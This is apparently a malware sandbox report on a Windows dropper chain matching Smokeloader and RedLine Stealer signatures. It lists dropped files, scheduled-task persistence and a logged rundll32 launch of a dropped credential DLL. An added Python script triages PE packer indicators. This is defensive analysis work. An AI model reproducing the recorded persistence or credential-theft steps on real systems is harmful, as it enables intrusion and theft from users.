Source: MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_INFO1_LIVEv10%
Source: d361f35322.exe, 00000009.00000003.2912110551.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_PRIVACY_METADATA/(9
Source: u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comVISITOR_PRIVACY_METADATAv10
Source: d361f35322.exe, 00000009.00000003.2912110551.0000000007DBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comYSC/)?
Source: MPGPH131.exe, 0000001B.00000003.3204849861.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819272725.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819336338.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000003.2232787568.00000000220DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.comYSCv10

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: ac861238af.exe, 00000010.00000003.7189686015.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICESYx memstr_ee7ff430-3
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File created: C:\Users\user\AppData\Local\Temp\TmpC21F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe File created: C:\Users\user\AppData\Local\Temp\TmpC1FF.tmp Jump to dropped file

System Summary

Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000031.00000002.2228939653.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000031.00000002.2228816968.0000000001B2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: swiiiii[1].exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiiii.exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 297472
Source: swiiii[1].exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 153088
Source: swiiii.exe.10.dr, RemoteObjects.cs Large array initialization: RemoteObjects: array initializer size 153088
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_95765f4c-3
Source: ac861238af.exe, 00000010.00000000.1932011901.0000000000762000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_1d9ccc15-0
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: .idata
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: .idata
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: .idata
Source: amert.exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: .idata
Source: random[1].exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: .idata
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: .idata
Source: explorha.exe.7.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: .idata
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: .idata
Source: MPGPH131.exe.9.dr Static PE information: section name:
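The "Static PE information" lines in this System Summary (blank section names, "Number of sections : 12 > 10", per-section "ZLIB complexity" near or above 1.0) are the kind of header-level packer indicators an analyst reproduces locally before handing a sample to a sandbox. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it parses the COFF section table with `struct` alone (no `pefile`), computes compressed-size/raw-size as the complexity metric (assumed to be what the report's "ZLIB complexity" denotes, consistent with the values above 1.0 it prints for tiny sections) plus Shannon entropy, and flags empty names, oversized section counts, packed-looking sections and writable+executable sections. The PE image it analyses is constructed in `sample_pe()` so the example runs offline; it is not the submitted sample, and the name `.boot` is reused only because it appears in the report.

```python
"""Added example: header-level packer indicators from a PE section table."""
import math
import random
import struct
import zlib

SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def zlib_complexity(data: bytes) -> float:
    """Compressed size / raw size. Near 0: zero-filled or padding; near 1:
    already compressed, packed or encrypted; above 1: the section is so small
    that zlib's own framing outweighs the payload (e.g. a stub .reloc)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, close to 8.0 for random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table, by hand."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        (name, _vsize, _va, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = SECTION_HEADER.unpack_from(
            pe, table + i * SECTION_HEADER.size)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw": raw, "characteristics": chars,
                         "zlib": zlib_complexity(raw),
                         "entropy": shannon_entropy(raw)})
    return sections


def triage(pe: bytes) -> list:
    """Findings in the spirit of the report's static PE lines."""
    sections = parse_sections(pe)
    findings = []
    if len(sections) > 10:
        findings.append(f"Number of sections : {len(sections)} > 10")
    for s in sections:
        if not s["name"]:
            findings.append("section with empty name")
        if s["zlib"] >= 0.98 and len(s["raw"]) >= 512:  # ignore tiny stubs
            findings.append(f"section {s['name']!r} ZLIB complexity "
                            f"{s['zlib']:.4f} (packed or encrypted data)")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and \
                s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']!r} is writable and executable")
    return findings


def build_minimal_pe(sections: list) -> bytes:
    """Constructed test image (not loadable by Windows): DOS stub, PE signature,
    COFF header with a zero-length optional header, section table, raw data."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    ptr = e_lfanew + 4 + len(coff) + SECTION_HEADER.size * len(sections)
    headers, body = b"", b""
    for name, data, chars in sections:
        headers += SECTION_HEADER.pack(name.ljust(8, b"\0")[:8], len(data), 0x1000,
                                       len(data), ptr, 0, 0, 0, 0, chars)
        body += data
        ptr += len(data)
    return bytes(dos) + b"PE\0\0" + coff + headers + body


def sample_pe() -> bytes:
    """Constructed sample: seeded noise stands in for a packed code section."""
    rng = random.Random(1436254)
    noise = bytes(rng.getrandbits(8) for _ in range(4096))
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    return build_minimal_pe([
        (b"", noise, rx),                                    # nameless, packed
        (b".boot", noise[::-1], rx | IMAGE_SCN_MEM_WRITE),   # packed and W+X
        (b".data", b"\0" * 4096, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".reloc", b"\x00\x10\x00\x00\x0c\x00\x00\x00", IMAGE_SCN_MEM_READ),
    ])


if __name__ == "__main__":
    for s in parse_sections(sample_pe()):
        print(f"{s['name'] or '<empty>':8s} size={len(s['raw']):5d} "
              f"zlib={s['zlib']:.4f} entropy={s['entropy']:.2f}")
    for finding in triage(sample_pe()):
        print("finding:", finding)
```

Run it on a real dropped file by replacing `sample_pe()` with the file's bytes; the 512-byte floor in `triage` keeps 8-byte stub sections like the `.reloc` above (complexity 2.0 here, 1.5 in the report) from being reported as packed, while the zero-filled `.data` scores near 0 and the noise sections score just above 1.0.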
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Windows\Tasks\explorta.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008D8080 9_2_008D8080
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082001D 9_2_0082001D
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008761D0 9_2_008761D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BC3E0 9_2_008BC3E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BB7E0 9_2_008BB7E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0085F730 9_2_0085F730
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0091C8D0 9_2_0091C8D0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_007EB8E0 9_2_007EB8E0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008B49B0 9_2_008B49B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00878A80 9_2_00878A80
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00871A60 9_2_00871A60
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0087CBF0 9_2_0087CBF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00887D20 9_2_00887D20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0087AEC0 9_2_0087AEC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00873ED0 9_2_00873ED0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0086DF60 9_2_0086DF60
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_009240A0 9_2_009240A0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_009120C0 9_2_009120C0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00817190 9_2_00817190
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00862100 9_2_00862100
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00881130 9_2_00881130
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00923160 9_2_00923160
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0091F280 9_2_0091F280
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082035F 9_2_0082035F
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008D0350 9_2_008D0350
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0080F570 9_2_0080F570
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00989680 9_2_00989680
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008347AD 9_2_008347AD
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0081A918 9_2_0081A918
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0081C950 9_2_0081C950
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00924AE0 9_2_00924AE0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00925A40 9_2_00925A40
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_0082DA74 9_2_0082DA74
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C4B90 9_2_008C4B90
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00838BA0 9_2_00838BA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00870BA0 9_2_00870BA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00838E20 9_2_00838E20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00881E40 9_2_00881E40
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008CBFC0 9_2_008CBFC0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008CCFC0 9_2_008CCFC0
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: String function: 007FACE0 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 928
Source: explorta.exe.0.dr Static PE information: Number of sections : 12 > 10
Source: 1CMweaqlKp.exe Static PE information: Number of sections : 12 > 10
Source: file300un.exe.10.dr Static PE information: No import functions for PE file found
Source: file300un[1].exe.10.dr Static PE information: No import functions for PE file found
Source: 1CMweaqlKp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000031.00000002.2228939653.00000000034F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000031.00000002.2228816968.0000000001B2B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: swiiiii[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiiii.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiii[1].exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiii.exe.10.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 0.9998594874100719
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 0.9919149709302325
Source: 1CMweaqlKp.exe Static PE information: Section: ZLIB complexity 1.00537109375
Source: 1CMweaqlKp.exe Static PE information: Section: .boot ZLIB complexity 0.9902337473891388
Source: 1CMweaqlKp.exe Static PE information: Section: .reloc ZLIB complexity 1.5
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998594874100719
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 0.9919149709302325
Source: explorta.exe.0.dr Static PE information: Section: ZLIB complexity 1.00537109375
Source: explorta.exe.0.dr Static PE information: Section: .boot ZLIB complexity 0.9902337473891388
Source: explorta.exe.0.dr Static PE information: Section: .reloc ZLIB complexity 1.5
Source: amert[1].exe.1.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: amert[1].exe.1.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: amert.exe.1.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: amert.exe.1.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: explorha.exe.7.dr Static PE information: Section: ZLIB complexity 0.9981777815013405
Source: explorha.exe.7.dr Static PE information: Section: avcjhwxy ZLIB complexity 0.9946098513719512
Source: gold[1].exe.10.dr Static PE information: Section: .Left ZLIB complexity 0.998365875385208
Source: gold.exe.10.dr Static PE information: Section: .Left ZLIB complexity 0.998365875385208
Source: sarra[1].exe.1.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file300un[1].exe.10.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: file300un.exe.10.dr, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@133/199@0/39
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2588
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Users\user\AppData\Local\Temp\5454e6f062
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: d361f35322.exe, 00000009.00000002.3072030296.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 0000001B.00000003.2069728672.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3349331204.0000000000701000.00000040.00000001.01000000.00000012.sdmp, MPGPH131.exe, 0000001C.00000003.2070120899.0000000005180000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2021888097.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3072062602.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000003.2138214229.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2634123106.0000000000891000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: d361f35322.exe, 00000009.00000002.3072030296.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 0000001B.00000003.2069728672.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3349331204.0000000000701000.00000040.00000001.01000000.00000012.sdmp, MPGPH131.exe, 0000001C.00000003.2070120899.0000000005180000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2021888097.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000002.3072062602.00000000007E1000.00000040.00000001.01000000.0000000C.sdmp, RageMP131.exe, 0000002E.00000003.2138214229.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002E.00000002.2634123106.0000000000891000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
